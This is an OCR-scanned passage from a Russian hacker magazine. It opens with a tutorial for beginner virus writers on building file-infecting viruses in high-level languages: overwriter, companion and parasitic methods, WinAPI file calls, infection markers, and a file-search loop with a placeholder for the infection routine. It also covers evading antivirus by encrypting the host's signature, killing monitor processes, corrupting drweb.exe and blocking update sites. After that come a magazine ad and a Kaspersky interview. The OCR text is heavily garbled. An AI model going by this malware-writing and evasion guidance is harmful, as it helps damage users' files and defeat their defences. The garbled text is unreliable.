Эфорект, как ты понимаешь, такой же. 
Запускаясь при каждой загрузке, ви- 
рус инсталлируется в оперативку и 
занимается, обычно, тремя вещами - 


a Сопоставляет файл с переменной 
AssignFile | нет аналога типа File или Textile 
- Открывает существующий файл и 
р и CREHSIE уст. позицию чтения в начало 
Создает новый файл и уст. пози- 
: ; цию чтения в начало. Если скор- 
ReWrite _Icreate CreateFile мить ReWrite существующий срайл, 
его содержимое будет обнулено 
> Читает в буфер определенное ко- 
BlockRead _lread ReadFile личество данных из файла 
BlockWrite | Ме ees || Poem sere al Sirtectls Sich) 
файл 
> те перемещает позицию чтения/за- 
SeekFile _Изеек SetFilePointer писи в открытом файле 
CloseFile _Iclose CloseHandle Закрывает открытый файл 
Егазе DeleteFile CEES Удаление файла 
устарела 
FindFirst FindFirstFile Поиск файла по критериям. 
FindNext | FindNextFile me Поиск следующего файла 


Памятка начинающего вирмейкера - самые интересные функции 


заражением сфайлов, освоением тра- 
фика пользователя и его адресбука. 
Заражение файлов происходит двумя 
путями - либо банальным поиском 
всех исполнимых файлов на всех воз- 
можных дисках, либо с помощью пе- 
рехвата обращений к срайлам при отк- 
рытии. Конечно, существует еще нес- 
колько способов поиска жертвы, но 
эти два - самые основные. 

Например, интересен способ поиска 
доступных файлов с помощью... FAR 
the File Manager. Tak вот, ты никогда 
не задумывался, зачем в корне диска 
находится файл "Tree.far"? А ведь 
это - обычный текстовый сфайл с пол- 
ным списком всех директорий и под- 
директорий текущего диска. Остается 
одно - открыть этот файл и построчно 
(процедуру ReadLn помнишь? :)) ис- 
кать в каждой директории ехе-файлы. 


Слава богу, для этой цели в WinApi 
есть функции 
FindFirstFile/FindNextFile, возвращаю- 
щие тебе указатель на сфайл, соответ- 
ствующий критериям (c:\*.exe - чем не 
критерий?). Создатели языков прог- 
раммирования написали свои вариан- 
ты этой функции, например, для 
Delphi это - FindFirst. Так, например, 
может выглядеть циклический поиск 
всех ехе-сайлов в заданной папке: 


тором. Давай посмотрим на самые по- 
пулярные из них. 


ВИРУСЫ - ОВЕРРАЙТЕРЫ (HIGH 
LEVEL LANGUAGE OVERWRITE) 
m Можно ли назвать это заражени- 
ем, я не знаю, потому что эти злодеи 
просто перезаписывают прогу-жертву 
своим телом. Как это делается? API- 
функция CreateFile или дельфийская 
ReWrite (var Е: File, обнуляющая суще- 
ствующий файл) помогут тебе в этом. 
Размножение виря происходит обыч- 
но с помощью функции CopyFile, пос- 
кольку ничего большего там и не тре- 
буется. 
В итоге - при попытке запуска "проги" 
юзер ловит сообщение в духе "stack 
overflow" или "seek error in drive С". 
То есть - правдоподобное объясне- 
ние, почему прога работать не будет. 
А вот вирус - работает и с большим 
удовольствием портит другие файлы 
своим присутствием. Писали эти вири 
в основном злобные школьники, поэ- 
тому, помимо своей деструктивной де- 
ятельности, они выводили длинные и 
зачастую оскорбительные тексты. 
Больше ничего примечательного в 
них нет, сейчас они почти не встреча- 
ются, поэтому я советую тебе о них 
забыть :). 


Когда текстовый редактор на фоне полно- 
го здоровья воруг жалуется на невоз- 
можность что-то куда-то записать, это на- 
водит на соответствующие мысли. 


result:= FindFirst 
('*,exe' faAnyFile,sr); 
WHILE Result= 0 DO 
begin 
//Процедура заражения должна 
быть здесь ;) 
FindNext (Sr); 
end; 


Ну, допустим, файл мы нашли Что 
дальше? А дальше - все зависит от 
алгоритма заражения, выбранного ав- 


ВИРУСЫ - КОМПАНЬОНЫ (HIGH 
LEVEL LANGUAGE COMPANION) 
и Это более современный способ, 
существующий, однако, уже лет 15. В 
этом случае вирус переименовывает 
найденный файл, снабжает его атри- 
бутами только чтение+скрытый+сис- 
темный, а оригинальное имя присваи- 
вает себе. В итоге юзер, запуская, ска- 
eo, iexplore.exe, запускает вирус, ко- 
торый, сделав свое дело, запускает 
оригинальный дайл, и юзер даже не 
замечает, что срайл заражен. В ста- 


рые времена эти вирусы поступали 
чуть по-другому - брали имя файла- 
жертвы и создавали свою копию, но с 
расширением .СОМ. Если юзер наби- 
рал в командной строке только имя 
файла (без расширения), то дос, кото- 
рый первым ищет сот-фай, запускал 
сначала вирус. 

"Почему же этот алгоритм жив 90 
сих пор, раз все лечение заключает- 
ся в обратном переименовании срай- 
ла-жертвы?" - спросишь ты и будешь 
абсолютно прав. 

Действительно, описанный мной 
способ легко обратим, но так никто и 
не делает :). Обычно вирус шифрует 
первые 512 байт или весь исходный 
файл - допустим, взаимообратимыми 
командами, вроде XOR/XOR, 
ADD/SUB, INC/DEC и т.п., но иногда 
встречаются и алгоритмы, способные 
вогнать в тоску самого И.Данилова 
:). Таким образом, этот способ явля- 
ется весьма эффективным и в плане 
надежности - нет необходимости чи- 
тать и писать из работающего срай- 
ла, что чревато очень подозритель- 
ными ошибками. А когда текстовый 
редактор на фоне полного здоровья 
вдруг жалуется на невозможность 
что-то куда-то записать, это наводит 
на соответствующие мысли. 


ВИРУСЫ - ПАРАЗИТЫ (HIGH 
LEVEL LANGUAG PARASITIC) 

и Еще одним продвинутым алгорит- 
мом заражения является паразитный 
способ, суть которого в том, что вирус 
приписывает себя к зараженной прог- 
рамме. Способов этих туева хуча, но 
наиболее популярными являются два 
- приписывание вируса спереди или 
сзади к программе. В первом случае 
все ясно - заражение происходит как 
copy /b virus.exe program.exe, в итоге 
схема зараженной проги будет такая: 


Работает все это тоже очень просто - 
вместо программы запускается вирус, 
который затем восстанавливает зара- 
женную прогу (либо вылечивая ее, 

затем заражая снова, либо - сохраняя 
оригинальную версию в левый файл) 
и запускает ее. Опять же - юзер ниче- 


го не подозревает, потому что все ра- 
ботает. Для заражения таким спосо- 
бом используются функции WinAPI: 


» 


Попавший 
же на комп 
вирус обыч- 
но перено- 
сит свое те- 
ло в укром- 
ное место 
(c:\win, 
например) 
со случай- 
ным именем 
и записыва- 
ет этот 
файл в ав- 
тозагрузку. 


Можно ли 
назвать это 
заражением, 
я не знаю, 
потому что 
эти злодеи 
просто пе- 
резаписы- 
вают прогу- 
жертву сво- 
им телом. 


HIGH LEVEL CODE | 


CreateFile, создающая указатель Ha 
новый срайл, с доступом 
GENERIC_READ (для чтения из зара- 
женного файла) или GENERIC_WRITE 
для записи тела вируса в файл. Меж- 
ду прочим, для этой функции есть 
флаги (dwShareMode), указывающие 
на то, как открываемый объект дол- 
жен распределять доступ между про- 
цессами, например: 
FILE_SHARE_READ - другим процессам 
можно читать из файла, 
FILE_SHARE_WRITE - To же самое, для 
чтения. Эти вещи могут очень приго- 
диться начинающему вирмейкеру, 
особенно - не читающему \\п32.Нр :). 
Есть еще устаревшая _lopen, но ee ис- 
пользуют только в самых простых 
случаях. 


ный), а запись осуществляется с по- 
мощью WriteFile или _LWrite. Прогу 
можно запустить с помощью функций 
CreateProcess или WinExec (лучше, 
все-таки, CreateProcess, не забудь, 
что вирусу нужно будет ждать завер- 
шения ее работы), после чего нам ос- 
танется только удалить левый файл 
процедурой DeleteFile. V это все. 0, 
чуть не забыл - любые изменения в 
файле должны завершаться 
CloseHandle, закрывающей срайл, ина- 
че никаких изменений там не будет, а 
ты будешь удивлен, почему же ниче- 
го не работает ;). Процесс заражения 
существующей программы в общем 
выглядит так: 

Чтение содержимого программы --> 
удаление ее/создание нового файла 


Заражать антивирусы - грешно. 
Дело в том, что при запуске они довольно 
придирчиво исследуют собственную 
целостность. 


_Lread или ReadFile - позволяют чи- 
тать данные из файла. Допустим, те- 
бе надо восстановить исходный сфайл 
из зараженного. Для этого необходи- 
мо сместиться на длину вируса (он же 
у нас первый) и прочесть все осталь- 
ные данные в буфер. Сместиться 
можно с помощью функции _LSeek 
(ей передается указатель и число, на 
сколько смещать), а буфер - это, разу- 
меется, массив/динамический массив. 
Несложно догадаться, что для таких 
манипуляций тебе надо знать ДЛИНУ 
вируса. То есть - объявлять специаль- 
ную константу VirSize, значение кото- 
рой ты уточнишь после компиляции. 
А затем - снова компилируешь с но- 
выми значениями. 


Итак, тело вируса у нас в одном буфе- 
ре, программа - в другом, что делать? 
Смотря что надо сделать :). Если запу- 
щен зараженный сфайл, то после от- 
работки основного вирусного кода 
прогу придется слить в левый файл 
на диск (чтобы запустить ее оттуда, 
разумеется), который, как ты знаешь, 
создается процедурой _LCreate (ей 
передается указатель и атрибуты но- 
ворожденного, например - O - архив- 


Фортран должен сдохнуть. Видимо, сильно насолил этот язык 
некоему вирмейкеру, раз он решился на такой слоган 
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ADinf+CureModule. Что же делать? Тут 
нам помогает все то же шифрование, 
причем, чем более извращенный ключ 
и алгоритм ты подберешь, тем лучше. 
Ключ вообще лучше генерировать ди- 
намически из каких-либо характерис- 
тик зараженной тачки, но... все равно 
файл будет расшифрован. Как? Да 
элементарно. Если ты тупо зашифру- 
ешь программу, не подумав, что пер- 
вые 2 байта - MZ (сигнатура) хорошо 
известны не только тебе, но и Лабора- 
тории Данилова (и всем остальным), 
процесс расшифровки пойдет как по 
маслу. Конечно, это не единственный 
косяк в данном случае, но тебе долж- 
но быть ясно - удаляй или переноси 
хотя бы сигнатуру, так антивирусам бу- 
дет намного сложнее лечить прогу. 
Во-вторых - это проблема чтения всей 
программулины в буфере. А если она 
16 Мб? Какие это будут тормоза, если 
вообще не облом? Выход один - чи- 
тать в буфер первую часть програм- 
мы, равную длине тела вируса, пере- 
носить ее в конец зараженной проги, а 
в начало писать, как обычно, вирус. 
При запуске инфицированной проги 


Лет 10 назад выяснилось, что если 
запаковать известный вирус 
неизвестным паковщиком, 
определяться В ФАИЛЕ он не будет. 


с этим же именем --> Запись тела ви- 
руса --> Запись проги --> Запись метки 
зараженности --> CloseHandle. 

Все процедуры для этого ты уже зна- 
ешь, остается только один вопрос - 
что такое метка зараженности? Как 
следует из названия, это то, что поз- 
воляет тебе не заразить один срайл 
два раза (после чего он откинется :)). 
Это может быть пара байт твоих ини- 
циалов, записанные после проги, мо- 
жет - некое условное время создания 
файла. Процедура FileSetDate сущест- 
вует именно gna этого, поэтому не 
стесняйся. Раньше многие вирмейке- 
ры любили выставлять файлу 62 се- 
кунду во времени создания и тому по- 
добную бредятину, но ты никогда так 
не делай :). Действительно, лучше ра- 
ботают несколько байт, записанных 
после проги. На- 
дежно, как сфорт- 
HOKC. 

Я рассмотрел са- 
мый простейший 
алгоритм зараже- 
ния, и, конечно же, 
в нем есть свой об- 
лом. Во-первых - 
лечится такой 
файл элементарно, 
достаточно знать 
размер програм- 
мы-жертвы, и та- 
кое под силу даже 


тебе, разумеется, придется проделать 
все это в обратном порядке. Кстати, 
помнишь, в начале я говорил, что ви- 
рус можно писать и в конец проги? 
Это не опечатка, и большинство виру- 
сов так и делают, предварительно за- 
писав в заголовок программы jmp near 
на тело вируса. То есть - он все равно 
запускается первым. 

На самом деле, таких проблем намно- 
го больше, а эти я привел только как 
намек на то, что писать вирусы - тя- 
желый, незаконный и неблагодарный 
труд :). Ведь на создание лечащего 
обновления на средний вирус у прог- 
раммеров-антивирусников уходит 
всего несколько минут. После чего 
это самое "горячее обновление" вык- 
ладывается на их сайте на обозрение 
широкой общественности. Но я что- 
то отвлекся, настало время расска- 
зать собственно о противодействии 
антивирусам. 


ИМЕЕМ АНТИВИРУС 

и Многие вири демонстрируют свое 
неуважение к антивирусу не только с 
помощью заложенных автором руга- 
тельств, но и реальными действиями. 
Думаю, тебе известно, что антивирус 
может определять и лечить только ви- 
русы, известные его автору. Изменить 
эту ситуацию пытаются давно, но пока 
безуспешно. Эвристический анализ 
страшен только вирусам, написанным 


на ассемблере (ga и TO He всем, слиш- 
ком много антиэвристических прие- 
мов. Не может же DR.WEB эмулиро- 
вать весь компьютер ;)). Высокоуров- 
невые же вирусы к нему имеют пол- 
ный иммунитет, поэтому я на этом не 
буду останавливаться. Правда, как я 
уже говорил, проги-ревизоры типа 
ADinf+Cure Module могут определять и 
лечить вирусы-паразиты только в том 
случае, если они ничего не шифруют, 
стоит же поХОБить даже маленький 
участок проги, как она объявляется 
неизлечимой, и юзер отправляется 
ждать обновления полидрага. 
Существует и еще несколько спосо- 
бов обмана. Например, лет 10 назад 
выяснилось, что если запаковать из- 
вестный вирус неизвестным паков- 
щиком, определяться В ФАЙЛЕ он не 
будет. Это было действительно весе- 
ло, поскольку юзеры заваливали ан- 
тивирусников жалобами, типа: "Ваш 
а ежедневно удаляет вирус в памя- 
ти, а он все равно там образуется. 
Что это за ....... !" Правда, вскоре ситу- 
ация разрулилась - антивирусы нау- 
чились на лету распаковывать и его. 
Сейчас, с появлением РЕ, все паков- 
щики для них известны антивирусам, 
и этот финт уже не проходит. А соз- 
дать свой собственный паковщик ку- 
да сложнее, чем изменить код уже 
написанного вируса :). 

Заражать антивирусы - грешно. Дело в 
том, что при запуске они довольно при- 
дирчиво исследуют собственную цело- 
CTHOCTb, иногда выдавая такой экран: 


Разумеется, тот рагазс-алгоритм, что 
я описал, не изменяет целостность 

файла, и им можно заражать даже ан- 
тивирусы, но практически все вирусы, 


ности мониторов трудно устроить. Но, 
как известно, на каждую хитрую... хм... 
прогу найдется свой болт Ha 16, и 
большинство современных вирусов 
научились просто убивать процессы, 
принадлежащие антивирусам-монито- 
pam (AVPMonitor, Norton Antivirus и 
T.n.). Правда, для этого вирус еще gon- 
жен ПОПАСТЬ на компьютер и не быть 
убитым раньше. Но уж если попал - то 
держись, потому что вирусы, перехва- 
тывающие трасрик, бывает, запреща- 
ют пользователю обращаться к сай- 
там антивирусников, проводить авто- 
матические обновления и качать но- 
вые версии, выполняя таким образом 
функции фаервола :). 

Чтобы избежать обнаружения, неко- 
торые высокоуровневые вирусы име- 
ют даже намек на полимороризм, а 
именно, таская за своим телом запа- 
кованный исходник, они бродят по 
диску юзера в поисках компилятора. 
Затем, слегка изменив текст никогда 
не выполняющимися командами (что- 
то типа "IF FALSE THEN"), компилиру- 
ютего и запускают. Получая слегка 
измененную версию. Заражать архи- 
вы вирусы тоже любят - особенно, ес- 
ли на диске имеется pkzip.exe или 
что-то в этом роде. А поскольку у 
большинства пользователей в пара- 
метрах сканера проверка архивов 
выключена (чтобы не тормозило), по- 
является реальный шанс пережить 
трудные времена. 

В общем, способов обмана антиви- 
русов придумано великое множест- 
во (каждый рад попинать бездуш- 
ную прогу :)), но журнал не резино- 
вый, поэтому я плавно перехожу к 
заключению. 


исходники которых я видел, имеют 
проверку имени файла, который они 
нашли (например: IF Sr.Name = 
‘drweb.exe' then ...). То есть, файл 
"drweb.exe" заражаться не будет, а бу- 
дет либо пропущен, либо - удален или 
испорчен. Скорее испорчен, поскольку 
это не вызывает подозрений. В связи 
с этим многие антивирусы стали раз- 
решать пользователям переименовы- 
вать исполнимые срайлы. Это не по- 
могло, и вирмейкеры ответили поис- 
ком антивируса по сигнатуре. Антиви- 
русники не нашли, чем ответить, и эта 
возможность существует по сей день. 
Главное - запуститься раньше антиви- 
руса, что при сегодняшней популяр- 


ВИРУСАМ - БОЙ! 

Надеюсь, я немного просветил 
тебя в вопросе устройства и образа 
жизни самоходного программного 
обеспечения, написанного на языках 
высокого уровня. Больше информа- 
ции ты можешь получить на офици- 
альных сайтах антивирусников и ви- 
русописателей, поскольку объять 
весь вирмейкинг в одной статье - за- 
дача не для слабых духом :). Успехов 


тебе и не заражайся. i 


B ПРОДАЖЕ 
С 23 СЕНТЯБРЯ 


Мозги в кармане 


выбираем flash 


— сравнительное тестирование самых 
распространенных флешек 


Корейские киборги 


— наш человек проник в святая святых 
индустриального гиганта 


Assembly 2003: Горячие 
финские демо-пати 


— репортаж участника крупнейшего слета 
демщиков 


Навечно on-line 
— Заливаем картинки и мелодии в мобилу 


Earth Simulator 


— где живет самый мощный компьютер 


Взлом крупного провайдера 


— реальная история с подробностями 


Разлочка мобильников 


— опьт народных умельцев 


Глобальный хак винды 


— АРС-уязвимость, 
породившая MSBlast 


— исследование устойчивости ОС семейства 
Windows к DoS—atakam 


Винда и DoS 


Боевой софт в Линукс 


— обзор программ для вооружения пингвина 


На нашем СО ты найдешь новый The 
Bat! v.2.0, Nero 6.0.15, четвертый 
Service Pack под WineK, демки с 
Assembly 2008 и еще кучу полезного 
и прикольного! 


www.xakep.ru 


Интервью 
Евгений Касперский 


Интернет -_ 
потенциальный 
источник заразы 
Как уберечь себя от вирусов в сети 


Как антивирус 
находит свои жертвы 
Анализ срайлов на предмет 
зараженности 


Dr.Web- как _ 
за каменной стеной! 
Интегрируем демонов с 
антивирусом 


Найдем и обезвредим 
Как обнаружить заразу в системе 


Ta 
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mindwOrk (www.livejournal.com/users/mindwOrk) 


ИНТЕРВЬЮ 


ЕВГЕНИЙ КАСПЕРСКИЙ 


ряд ли мне нужно представлять своего собеседника. Если ты ценишь безопас- 

ность своей системы и на пушечный выстрел не подпускаешь электронную за- 
разу к своей немерено важной инфе, тебе должна быть знакома эта фамилия. Имен- 
но благодаря Евгению Касперскому и его антивирусу мы можем спать спокойно, не 
боясь, что злые вири сожрут с потрохами наш винт. "Антивирус Касперского" 
был признан лучшим в мире не только многими престижными организаци- 
ями, но даже представителями сообщества вирусмейкеров. 


0 КОМПАНИИ 

mindwOrk: Здравствуйте, Ев- 
гений. Расскажите, пожа- 
луйста, о вашей "Лаборато- 
рии Касперского". Не офици- 
альные сводки, которые есть на сайте, 
больше интересует именно атмосфера. В 
каком помещении проводятся все основ- 
ные исследования и разработки, насколько 
технически оснащена компания, какие тре- 
бования предъявляются к сотрудникам... в 
таком духе. 


Работаем мы 
круглосуточно, без праздников и выход- 
ных. Особенно это касается антивирусных 
экспертов и службы технической поддерж- 
ки. Понятно, что вирусам не знакомы тер- 
мины "спокойный ночной сон" и "работа с 
10 go 18", пользователям защита нужна 
круглосуточно. К тому же люди живут по 
всему миру, во всех часовых поясах. А на- 
ше призвание предоставлять лучшую за- 
щиту. Лучшую - значит эффективную и в 
срок. Работа в компании обычно проходит 
так: обнаруживается вирус, в зависимости 
от его типа распределяется на анализ оп- 
ределенному эксперту. Он разрабатывает 
сигнатуру, пишет описания для Энциклопе- 
дии. Потом результаты работы аккумулиру- 
ются специальным роботом, который тести- 
рует и выпускает обновление. Все это тре- 
бует огромных организаторских способнос- 
тей, личной заинтересованности и вовле- 
ченности сотрудников. На создание этих 
условий и направлены усилия компании. 
Технический департамент занимает обшир- 
ное помещение, оборудованное No nocneg- 
нему слову техники и эргономики. Обста- 
новка максимально деловая, но без излиш- 
ней бюрократии - этого мы терпеть не мо- 
жем. Бюрократия убивает инициативу и де- 
мотивирует. 


minowOrk: Почему вы решили переимено- 
вать Antiviral Toolkit Pro B Антивирус Кас- 
перского? AVP - как-то привычнее :). 
Долгая и грязная история, куда вовле- 
чены киберсквотеры и просто непорядоч- 
ные люди. По сути дела, у нас украли этот 
бренд, и затем шантажировали. С другой 
стороны, рано или поздно смена обязана 
была произойти. В названиях продукта и 
компании должна быть гармония: у рядово- 
го пользователя AVP с трудом ассоцииру- 
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ется с "Касперский". Кроме того, "Лабора- 
тория" сегодня занимается не только анти- 
вирусами, но также межсетевыми экранами 
(Kaspersky Anti-Hacker) и защитой от спама 
(Kaspersky Anti-Spam). Здесь бренд высту- 
пает в роли зонтика и придает новым про- 
дуктам вес, перенося на них доверие, зара- 
ботанное антивирусом. Спорный вопрос, но 
еще мне кажется, что корпоративный про- 
дукт не может носить название AVP. Оно 
звучит немного легкомысленно и отдает га- 
ражным любительством. 


mindwOrk: Какие антивирусные компании 
вы считаете своими основными конкурен- 
тами и почему? Какие у вас с ними отноше- 
ния? Насколько тесно вы сотрудничаете? 

Все зависит от сегмента рынка и страны. 
Вообще, я предпочитаю не показывать паль- 
цем в таких вопросах. Ведь вопрос ритори- 
ческий: что, помимо "Касперский", вам при- 
ходит в голову, когда вы задумываетесь об 
антивирусной защите? С большинством за- 
падных разработчиков у нас тесные профес- 
сиональные связи: ведь мы все делаем одно 
дело, и, чтобы все пользователи получали 
защиту как можно быстрее, нам просто необ- 
ходимо работать вместе. Антивирусные ком- 
пании объединены в несколько неформаль- 
ных организаций (например, САКО - 
Computer Antivirus Researchers! Organisation), 
где участники обсуждают строение вирусов 
и делятся опытом по разработке защиты. 


mindwOrk: Как часто сотрудники 
компании участвуют в конференци- 
ях, посвященных проблеме виру- 
сов? Готовите ли вы доклады? Нас- 
колько вообще важны такие KOHCpe- 
ренции? 

EK: Участвуем, докладываем, причем 
много и регулярно. Я бы даже ска- 
зал, редкая конференция проходит 
без нашего участия. Подобные ме- 
роприятия очень важны. Ведь это 
обмен бесценным опытом, а также 
отличная возможность наконец-то 
преодолеть барьер электронной 
почты и увидеть коллег по цеху во- 
oun. 


mindwOrk: Лично у вас с коллегами 
отношения сугубо деловые, или вы 
при желании можете сыграть с кем- 
то из них партию в бильярд, выпить 
по чашечке пива в непринужденной 
обстановке? 

EK: "Деловые" отношения царят, в 
основном, на официальных мероп- 
риятиях и переговорах. Как только 
мы снимаем галстуки, то все проис- 
ходит по описанному вами сцена- 
рию. 


mindwOrk: Сколько сотрудников сей- 
час работает в "Лаборатории Каспе- 
рского"? Каким образом вы подби- 
раете новые кадры? 

ЕК; Сейчас нас 250 человек. 85% из 
них работают в нашей штаб-кварти- 
ре в Москве, остальные - в основном 
специалисты по маркетингу, прода- 
жам и техподдержке - находятся в 
офисах в Англии, Франции, США, 
Польше, Нидерландах, Японии и Ки- 
тае. Вряд ли можно однозначно оп- 
ределить нашу кадровую политику. 
Все случается, и мы приглашаем, и 
сами приходят. Хотя большинство 
все-таки находим мы сами. 


mindwOrk: А среди ваших сотрудни- 
ков есть люди, которые в прошлом 
занимались написанием вирусов? 
Если нет - могли бы вы взять такого 
человека к себе на работу? 

EK: Нет, таких людей нет. По крайней 
мере, я надеюсь, среди моих coTpyg- 
ников нет людей, умеющих это так 
ловко скрывать. Понимаете, вирусо- 
писательство - это диагноз, который 
с трудом поддается лечению. Да, 
есть примеры из других областей - 
преступник Видок стал знаменитым 
полицейским. В вирусописательстве 
мне пока такие случаи неизвестны. 
Я не стану пятнать репутацию "Ла- 
боратории", так что создателям ви- 
русов путь к нам заказан. 


mindwOrk: Насколько успешно и 
оперативно вам удается справлять- 
ся с задачей поддержания информа- 
ционной безопасности? 

Ek: В среднем нам требуется всего 
5-7 минут для анализа каждого ви- 
руса. Иногда 1-2 минуты. Редко, но 
бывают тяжелые случаи, когда кор- 


пим над кодом целый день. Когда 
специалисты из конкурирующих 
фирм узнают об этом - сильно удив- 
ляются. У них в лабораториях рабо- 
тает в 3-4 раза больше людей, а мы 
успеваем все сделать быстрее и 
лучше. Думаю, удается это нам бла- 
годаря таланту сотрудников, пра- 
вильной организации процессов и 
мощным средствам автоматизации. 


тпам/Огк: Насколько велик вклад 
отечественных вирусмейкеров в об- 
щее количество вирусных инциден- 
тов? Как вы оцениваете профессио- 
нализм наших авторов вирей? 

ЕК; Есть прямая связь между актив- 
ностью вирусописателей и экономи- 
ческим положением в стране. Сей- 
час у нас все хорошо, поэтому рос- 
сийские вирусы сегодня большая 
редкость. Тем более редкость - вы- 
сококлассный вирус. Те, кто могли 
бы его создать, уже давно образу- 
мились и зарабатывают приличные 
деньги на программировании более 
полезных вещей. Так что сегодня 
основной поток вирусов идет из ис- 
паноязычных стран и Юго-Восточ- 
ной Азии. 


mindwOrk:"Na6opatopua Касперско- 
го" за время своего существования 
завоевала много разных наград. 
Есть среди них такая, которой вы 
особенно гордитесь? 

ЕК: Самая первая, 94 года - дебют 
нашей программы на международ- 
ных тестах. Это были тесты Гамбур- 
гского университета, где участвова- 
ли практически все антивирусы ми- 
ра. Для нас это было первое испыта- 
ние, и мы победили. Не просто побе- 
дили, а оставили далеко позади всех 
конкурентов. 


mindwOrk: Расскажите о новых раз- 
работках компании. Какие продукты 
сейчас куются в недрах "Лаборато- 
рии"? Каким проектам уделяется на- 
ибольшее внимание? 

EK: В первую очередь, это наш но- 
вый проект Kaspersky Anti-Hacker, 


которому скоро исполнится год. Тай- 
на его происхождения проста и не- 
замысловата. Вирусы стали настоль- 
ко сложным явлением, настолько 
срослись с другой криминальной об- 
ластью - хакерскими атаками, что 
рынку стал остро необходим единый 
продукт. Продукт, объединяющий 
функции антивируса, межсетевого 
экрана и антиспама. Сейчас мы нахо- 
димся на стадии готовности отдель- 
ных продуктов и работаем над их ин- 
теграцией. Не за горами время, ког- 
да пользователи будут устанавли- 
вать He Kaspersky Anti-Virus, а 
Kaspersky Security. Вторая наша 
перспективная разработка - 
Kaspersky Anti-Spam. Пока она рас- 
считана только на корпоративных 
пользователей, но в начале 2004 г. 
мы представим на рынок персональ- 
ную версию. Пользователи смогут 
фильтровать спам лингвистическим 
эвристиком, сигнатурами спама, чер- 
ными и белыми списками, а также по 
формальным признакам спама. Ин- 
терфейс будет максимально прост и 
удобен, чтобы разобраться в нем 
смогли даже начинающие пользова- 
тели. В общих чертах: программа ин- 
тегрируется в почтового клиента и 
обрабатывает входящую корреспон- 
денцию. Спаму присваиваются спе- 
циальные метки, благодаря которым 
его можно рассортировывать в спе- 
циальные папки, игнорировать или 
удалять. 


mindwOrk: Как известно, Россия и 
Украина занимают ведущие места в 
списке самых пиратских стран (по 
количеству пиратской продукции). 
Наверняка это затронуло интересы 
и вашей компании. Пытаетесь ли вы 
как-то бороться с этим? Насколько 
велики потери компании от деятель- 
ности пиратов? И каково соотноше- 
ние выпускаемой вами продукции 
для зарубежного рынка по сравне- 
нию с нашим? 

EK: Давайте по порядку. Начну с 
конца - продажи "Россия-неРоссия" 


распределяются в пропорции 40-60. » 


Выступление Касперского на одной из конференций 


Вообще, это 
затягивает. 
Ведь каж- 
дый вирус - 
своего рода 
задача. 
Иногда по- 
падаются 
очень слож- 
ные задачи. 
И нахожде- 
ние реше- 
ния - как 
курение. 
Начнешь 
один раз, и 
потом уже 
не остано- 
виться. 


У вирусов 
по умолча- 
нию не мо- 
жет быть 
хорошего 
кода, это 
как атомная 
бомба - мо- 
жет ли 
быть хоро- 
шим сред- 
ство унич- 
тожения 
людей? 


... я не вижу 
такого ав- 
торитета, 
который 
мог бы меня 
научить че- 
му-то прин- 
ципиально 
новому. 
Скорее нао- 
борот. 


Для нас это 
было первое 
испытание, 
и мы побе- 
дили. Не 
просто по- 
бедили, а 
оставили 
далеко по- 
зади всех 
конкурен- 
тов. 


... подавля- 
ющее боль- 
LUMHCTBO 


вредонос- 
ных прог- 
рамм (95%) 
нацелены 
только на 
Windows. 
Это логич- 
но, ведь эта 
операцион- 
ная система 
- самая по- 
пулярная. 
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Российский рынок сейчас очень 
быстро растет, заказчики прекрасно 
осознают необходимость защиты, а 
также то, что на пиратском рынке 
можно купить только код. Антивирус 
- это сервис, важнейшее крыло кото- 
рого - техническая поддержка, кон- 
салтинг, внедрение и т.д. Ведь если 
в сеть фирмы пролезет вирус и при- 
чинит вред только потому, что уста- 
новленный антивирус оказался не- 
лицензионным, вина ляжет на плечи 
администратора. Лучше перестрахо- 
ваться и жить спокойно. Тем более, 
это не такие уж и большие деньги. 


mindwOrk: Как часто хакеры атакуют 
ваш сайт? И насколько успешно у 
них это получается? 

ЕК; Атакуют постоянно и с завидным 
упорством. Отражением атак и отс- 
леживанием хулиганов у нас зани- 
мается специальное подразделение. 
Надо сказать, ему это удается. Нас 
успешно взломали только один раз - 
хакеры использовали очень извра- 
щенный способ взлома, который 
больше никогда и нигде не приме- 
нялся. Но ни один из наших пользо- 
вателей не пострадал - у всех стоит 
наш антивирус. 


© СЕБЕ 

mindwOrk: Расскажите о ваших пер- 
вых компьютерных годах. Где и как 
стали изучать программирование? 
Насколько легко вам это давалось? 
EK: Программированием я заразился 
еще будучи учеником физико-мате- 
матической школы. Потом болезнь 
усугубилась в институте криптогра- 
фии. Однако ее практическое приме- 
нение я нашел уже после распреде- 
ления. В одном научно-исследова- 
тельском институте мне досталась 
мощнейшая по тем временам Olivetti 
(IBM ХТ), и моей радости не было 
конца. Как сел тогда, так до сих пор 
не вылезаю. 


mindwOrk: А насколько легко вам да- 
валось изучение программирова- 
ния? Кто был вашим наставником 
(книги, по которым изучали, люди, 
которые помогали)? Какой язык 
программирования ваш любимый? 
Как часто вы сейчас занимаетесь 
именно программированием? 

ЕК; Изучение программирования мне 
всегда давалось легко. Наставников 
перечислять можно долго: среди них 
родители, учителя, книги и просто 
случайные люди. Из всех языков я 
всегда испытывал слабость к Ассемб- 
леру. Сейчас чистым программирова- 
нием, системным или прикладным, 
практически не занимаюсь. Все вре- 
мя уходит на анализ вирусов и раз- 
работку антивирусных сигнатур. 


mindwOrk: Расскажите, как произош- 
ло ваше первое знакомство с компь- 
ютерными вирусами. И откуда взял- 
ся такой к ним такой интерес? 


ХАКЕРСПЕЦ 
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ЕК; Не совсем так. Не интерес к 
компьютерным вирусам, а, скорее, 
ненависть к ним. Можете себе 
представить причину того, что вы 
работаете до 12 ночи, без выходных 
и отпусков? А ведь все из-за них, 
вирусов. Началось все в бородатом 
1989 с вируса "Cascade". Попал он 
ко мне банально, на дискете. Варуг 
посыпались буковки, было безумно 
интересно. Уже тогда феномен был 
на слуху, и я сразу понял, с чем 
имею дело. Стало интересно, нашел 
зараженные файлы, проанализиро- 
вал и жутко захотел сделать прог- 
рамму, которая их восстанавливает. 
Сделал. Ее далеким потомком сейчас 
наслаждается около 70% российс- 
ких пользователей. 


mindwOrk: А что собой представляла 
самая первая версия вашего антиви- 
руса? Каким было первоначальное 
название? Какие функции он вы- 
полнял? 

ЕК: Самая первая версия уже на тот 
момент была чудом техники: псев- 
дографический интерфейс, подде- 
ржка мышки, разнообразные опции. 
Еще go AVP она носила имя "-\/": с 
одной стороны, минус символизиру- 
ет судьбу буквы \/ (однозначно ука- 
зывает на Virus), с другой - это пер- 
вый символ таблицы кодировки, так 
что моя программа всегда занимала 
первое место в каталоге. 


mindwOrk: Какие знания/качества 
нужны для того, чтобы успешно 
справляться с работой руководите- 
ля антивирусных исследований в 
компании "Kaspersky Labs"? 

EK: Я все же достаточно скромный 
